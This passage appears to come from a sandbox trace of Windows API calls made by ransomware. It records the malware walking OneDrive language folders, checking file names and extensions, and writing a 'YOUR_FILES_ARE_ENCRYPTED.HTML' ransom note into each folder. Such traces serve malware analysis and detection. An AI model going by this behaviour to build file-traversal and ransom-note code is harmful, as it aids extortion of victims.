param_2="%02X" | out: param_1="83") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1E") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="EE") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="86") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="F4") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="EE") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="4B") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3B") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="D4") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="9D") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="0E") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="32") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="09") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="66") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="05") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DA") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C1") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="57") returned 2 [0160.330] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" [0160.330] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.330] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.330] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cs", cAlternateFileName="")) returned 1 [0160.330] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs") returned 74 [0160.330] GetProcessHeap () returned 0x270000 [0160.330] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.330] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs" [0160.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*" [0160.330] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.375] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.375] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned -1 [0160.375] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.375] lstrlenW (lpString=".mui") returned 4 [0160.375] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.376] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.376] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\cs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.377] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.379] CloseHandle (hObject=0x5a8) returned 1 [0160.380] GetProcessHeap () returned 0x270000 [0160.381] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) 
returned 1 [0160.382] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cy-gb", cAlternateFileName="")) returned 1 [0160.382] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb") returned 77 [0160.382] GetProcessHeap () returned 0x270000 [0160.382] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.382] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb" [0160.382] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*" [0160.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.383] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.383] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.383] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.383] lstrlenW (lpString=".mui") returned 4 [0160.383] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.383] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.384] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\cy-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.384] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.386] CloseHandle (hObject=0x5a8) returned 1 [0160.386] GetProcessHeap () returned 0x270000 [0160.387] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.387] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, 
ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="da", cAlternateFileName="")) returned 1 [0160.387] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da") returned 74 [0160.387] GetProcessHeap () returned 0x270000 [0160.387] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.387] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da" [0160.387] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*" [0160.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.389] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.389] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.389] lstrlenW (lpString=".mui") returned 4 [0160.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x3ca792, 
dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.389] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.391] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\da\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.394] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.396] CloseHandle (hObject=0x5a8) returned 1 [0160.397] GetProcessHeap () returned 0x270000 [0160.398] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.398] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="de", cAlternateFileName="")) returned 1 [0160.398] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de") 
returned 74 [0160.398] GetProcessHeap () returned 0x270000 [0160.398] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.398] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de" [0160.398] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*" [0160.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.399] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.399] FindNextFileW (in: 
hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.399] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.399] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.399] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.399] lstrlenW (lpString=".mui") returned 4 [0160.399] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.399] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.399] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.399] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
